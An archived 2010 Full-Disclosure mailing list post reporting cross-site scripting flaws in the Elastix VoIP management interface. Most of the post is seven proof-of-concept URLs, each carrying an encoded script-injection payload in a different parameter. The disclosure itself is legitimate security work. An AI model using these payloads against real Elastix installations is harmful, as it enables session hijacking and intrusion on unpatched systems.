lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 1 Nov 2010 03:16:10 +1100 From: dave b <db.pub.mail@...il.com> To: full-disclosure <full-disclosure@...ts.grok.org.uk> Subject: Fwd: xss in elastix Oh look I think bugtraq hates me .... more lame xss in yet another voip management user interface for asterisk... ---------- Forwarded message ---------- From: dave b <db.pub.mail@...il.com> Date: 29 October 2010 03:36 Subject: xss in elastix To: bugtraq@...urityfocus.com xss in elastix(http://www.elastix.org/) , 1. https://10.0.20.226/index.php?menu=packages&nombre_paquete=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&submitInstalado=installed&submit_nombre=Search 2. https://10.0.20.226/?menu=pbxconfig&display=recordings&Submit=Go&display=recordings&usersnum=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E 3. https://10.0.20.226/index.php?menu=cdrreport&date_end=28%20Oct%202010&date_start=28%20Oct%202010&field_name=dst&field_pattern=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&filter=Filter&status=ALL 4. https://10.0.20.226/index.php?menu=asterisk_log&filter=2010-10-28&offset=0&busqueda=&ultima_busqueda=&ultimo_offset=&&busqueda=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&filter=2010-10-28&offset=0&show=Show&ultima_busqueda=&ultimo_offset= 5. https://10.0.20.226/index.php?menu=summary_by_extension&option_fil=&value_fil=&date_from=28&date_from=28%20Oct%202010&date_to=28%20Oct%202010&option_fil=Ext&show=Show&value_fil=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E 6. https://10.0.20.226/index.php?menu=grouplist&action=view&id=1%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E 7. https://10.0.20.226/index.php?menu=group_permission&filter_group=1&filter_resource=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/